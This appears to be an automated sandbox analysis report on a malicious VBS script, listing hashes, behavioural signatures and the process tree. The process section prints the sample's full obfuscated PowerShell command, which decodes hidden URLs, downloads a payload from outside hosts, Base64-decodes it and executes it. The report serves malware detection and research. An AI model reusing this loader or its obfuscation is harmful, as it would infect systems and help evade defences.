Analysis
-
max time kernel
148s -
max time network
152s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
10-07-2024 14:35
Static task
static1
Behavioral task
behavioral1
Sample
0b94686d3db00daa1480418c1f74d8e0917a60db9d316864043b4ed11074c8e2.vbs
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
0b94686d3db00daa1480418c1f74d8e0917a60db9d316864043b4ed11074c8e2.vbs
Resource
win10v2004-20240709-en
General
-
Target
0b94686d3db00daa1480418c1f74d8e0917a60db9d316864043b4ed11074c8e2.vbs
-
Size
101KB
-
MD5
20d1961bd8aa051dfb5632bf9be3e084
-
SHA1
75aafde8ec0657db8c60570c12620e0b7072f552
-
SHA256
0b94686d3db00daa1480418c1f74d8e0917a60db9d316864043b4ed11074c8e2
-
SHA512
3a362c2598bdacbb574b2663fac8679a52f84b158e405c2a44581fe45537e05bf09c2d41bb68848d64c419683810c6fa5bb17d8dd04bdc67ab0c4ef53188534f
-
SSDEEP
3072:p4oGKaBSPReHzR0WAjT28fyxa+CS64B9Ou4rIQCtvaiIu:Ot7SPReHd0WoT28faa+CS64mu8IQCtv1
Malware Config
Signatures
-
Blocklisted process makes network request 59 IoCs
Processes:
WScript.exepowershell.exeflow pid process 3 2436 WScript.exe 7 2708 powershell.exe 8 2708 powershell.exe 9 2708 powershell.exe 10 2708 powershell.exe 12 2708 powershell.exe 13 2708 powershell.exe 14 2708 powershell.exe 15 2708 powershell.exe 16 2708 powershell.exe 17 2708 powershell.exe 18 2708 powershell.exe 19 2708 powershell.exe 20 2708 powershell.exe 21 2708 powershell.exe 22 2708 powershell.exe 23 2708 powershell.exe 24 2708 powershell.exe 25 2708 powershell.exe 26 2708 powershell.exe 27 2708 powershell.exe 28 2708 powershell.exe 29 2708 powershell.exe 30 2708 powershell.exe 31 2708 powershell.exe 32 2708 powershell.exe 33 2708 powershell.exe 34 2708 powershell.exe 35 2708 powershell.exe 36 2708 powershell.exe 37 2708 powershell.exe 38 2708 powershell.exe 39 2708 powershell.exe 40 2708 powershell.exe 41 2708 powershell.exe 42 2708 powershell.exe 43 2708 powershell.exe 44 2708 powershell.exe 45 2708 powershell.exe 46 2708 powershell.exe 47 2708 powershell.exe 48 2708 powershell.exe 49 2708 powershell.exe 50 2708 powershell.exe 51 2708 powershell.exe 52 2708 powershell.exe 53 2708 powershell.exe 54 2708 powershell.exe 55 2708 powershell.exe 56 2708 powershell.exe 57 2708 powershell.exe 58 2708 powershell.exe 59 2708 powershell.exe 60 2708 powershell.exe 61 2708 powershell.exe 62 2708 powershell.exe 63 2708 powershell.exe 64 2708 powershell.exe 65 2708 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2708 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2708 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
WScript.exepowershell.exedescription pid process target process PID 2436 wrote to memory of 2708 2436 WScript.exe powershell.exe PID 2436 wrote to memory of 2708 2436 WScript.exe powershell.exe PID 2436 wrote to memory of 2708 2436 WScript.exe powershell.exe PID 2708 wrote to memory of 2568 2708 powershell.exe cmd.exe PID 2708 wrote to memory of 2568 2708 powershell.exe cmd.exe PID 2708 wrote to memory of 2568 2708 powershell.exe cmd.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\0b94686d3db00daa1480418c1f74d8e0917a60db9d316864043b4ed11074c8e2.vbs"1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2436 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Tunnellen Tightropes6 Spaltegruppens Forfatningstiltag Coner Browache13 Kathode Baksning Religionists Feldbk Muselessness Caxiri Autoforhandlerens Umbral Gaeldom Lasciviently Adenodynia Pondlike Udskrivningsskemaers Lystige Styrerens Osnaburg Grihastha disputative Tunnellen Tightropes6 Spaltegruppens Forfatningstiltag Coner Browache13 Kathode Baksning Religionists Feldbk Muselessness Caxiri Autoforhandlerens Umbral Gaeldom Lasciviently Adenodynia Pondlike Udskrivningsskemaers Lystige Styrerens Osnaburg Grihastha disputative';If (${host}.CurrentCulture) {$Lejlighedsdigter++;}Function Valgsted($Reprsentationsudgift){$datasikkerheders=$Reprsentationsudgift.Length-$Lejlighedsdigter;$Achter='SUBsTR';$Achter+='ing';For( $Extratellurian=1;$Extratellurian -lt $datasikkerheders;$Extratellurian+=2){$Tunnellen+=$Reprsentationsudgift.$Achter.Invoke( $Extratellurian, $Lejlighedsdigter);}$Tunnellen;}function Differen($Dilettants){ & ($Bookmakernes) ($Dilettants);}$Bliden=Valgsted ' MSoRzmiGl.l a /T5T. 0. u(,W iMn,d.oMwFs PN T 1 0 .B0 ; W.iHnD6.4D;T WxO6N4G;R BrNvP:A1S2 1B.B0 )S GBe cMkAo./F2e0 1,0 0N1A0e1S JFPi rBeYfgoTx /H1A2S1,.,0 ';$Skridtbeskytteren=Valgsted 'PUHsHe r,- A gFeSn tT ';$Coner=Valgsted 'MhSt t.pIs,:G/D/.eSvEo l,u xIcdoFnStha,bTiBlHi dUaLd eA..cio.m .FbFr,/Fr dB/UG.rMeBeBn l,aTn,dA.SxSt p >NhAtntPp s.:r/,/ eSuPrso - f i eLrP-UvDeWc,h i . rFoL/GG,rNe,e n.lFa n dU.UxPtApA ';$Tjenstlig=Valgsted ' >M ';$Bookmakernes=Valgsted 'Bi.e xR ';$Serioese='Baksning';$Lignitize = Valgsted 'Se c h oO P% a pBpFd,a tMa.%I\UPRlSa,nAf u l n,e sPsC.DDvy,kR ,&J&. SeEc.h,o, tR ';Differen (Valgsted 'G$Sg l o,b a l :.RHeTcSa nTcJeRl e.dB=S(Sc mid R/ c. ,$,LNi.gUnMiUtHiDzVet)N ');Differen (Valgsted ' $.g.lHo bRa lC:KF,o.rEfva t.n iBnDgDsst iSlStbaSg =J$KCGoKn.e r .OsRp l,iAtI(.$ST.j eSn,sLtUl.irg.)D ');Differen (Valgsted 'K[ N,e.t,.USGe rLv iHc.eUP oMi,nStAMMaPn,angLe,r,]H:U:.S.ePcsuNrSiAtAy,PPrDoOt o cMoSl =J .[KNLe t . S.e c uTrPi t.ybPPr,o.tFoFc.oPl T y,pFe ]A: : TGlTs 1,2a ');$Coner=$Forfatningstiltag[0];$Pelt241= (Valgsted 'L$TgEl,oRbda,l :,A nFtBoAn eRl,l.e.s.=HNGe w - OMb jGeBc tP RS.y s,t e mG. N e.t.. W.eKb CmlLi e nwt');$Pelt241+=$Recanceled[1];Differen ($Pelt241);Differen (Valgsted 'A$UAUn.tVoPnre l.l,ePsB.KHAe a dIe,r s,[p$ S k.rBiSdAtMb e sQk y t tEegr,eMn ]g=b$ B lPiPd e n ');$Beskydningen=Valgsted ',$ ATn tKoKnre l lIeDsW.lDtoSwFnNl,oPa dAFTiRl.eI(S$,C oDn e.r ,f$HO.s.n a,bEuDrCg.)l ';$Osnaburg=$Recanceled[0];Differen (Valgsted ' $ gGl o bSa l :SA u t oBmRaSt kVa,fHeB=,( T e s t,-,P astFhT l$JO.s,nAaSbSuEr.gC) ');while (!$Automatkafe) {Differen (Valgsted 'A$ g l oObBa,l :TLHo b e l iAe.rDn.e = $ tFrSuDeA ') ;Differen $Beskydningen;Differen (Valgsted ',S tAaFrRt -.S.l,e,e p ,4F ');Differen (Valgsted ' $,g l oTbDa lD: ACuMtuo m a tJk a fKe = ( T eVs.tF-,P aStTh J$ O s n,a,bDusrBgA)H ') ;Differen (Valgsted 'H$BgUlHo b,aRlA:NS.pGaNl.t eFg r uGphp eNn.s,=L$.gElMo bPa.le:CT iAg hFt.rSoTp eDs 6,+I+ % $lFUo rBf.aSt n i,nEgRsPt,iEl.tGaVg . cAo uGnGt ') ;$Coner=$Forfatningstiltag[$Spaltegruppens];}$Akkomoderet=328490;$Soothest=27621;Differen (Valgsted 'C$ g lSoPbDa lB:DRPeAl,i,g.iMo,n i sCt s = DG,eFt -VC,oRn tReRn t. $ O s.nPaBb u r g ');Differen (Valgsted ' $ gCl.o bWa.l :dV e.j tor e rGnGe 1s5D8S ,= ,[,SDyAs,t,e md. CKo,n vHe rKtH] : :SF rto mHBBaQs,e 6T4FSEt r iSnKgH(G$SR e l.i,g i oMn iBsStRsO) ');Differen (Valgsted 'S$ g.lBo bra.l,: CSaAx iUr i, B=D D[ SSyBs t.e m..LT eKx t .AERnBc oSd i,n g ]D: : AMS.CBI I,.UG ePtPSEt r ijnFg ( $ V eFjVt rPe.r n,e.1I5A8C) ');Differen (Valgsted ' $Hg,l,oDbMaMlL: U.nMp r,o.v aLbSl.y =r$TCna,x.igr.iH.Ts uSbOs.tDrMi nSg,( $NAIkCkDoUmAo.dFeDrDeAtS,e$ SUo oRtShCeSs,t )T ');Differen $Unprovably;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2708 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Planfulness.Dyk && echo t"3⤵PID:2568
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b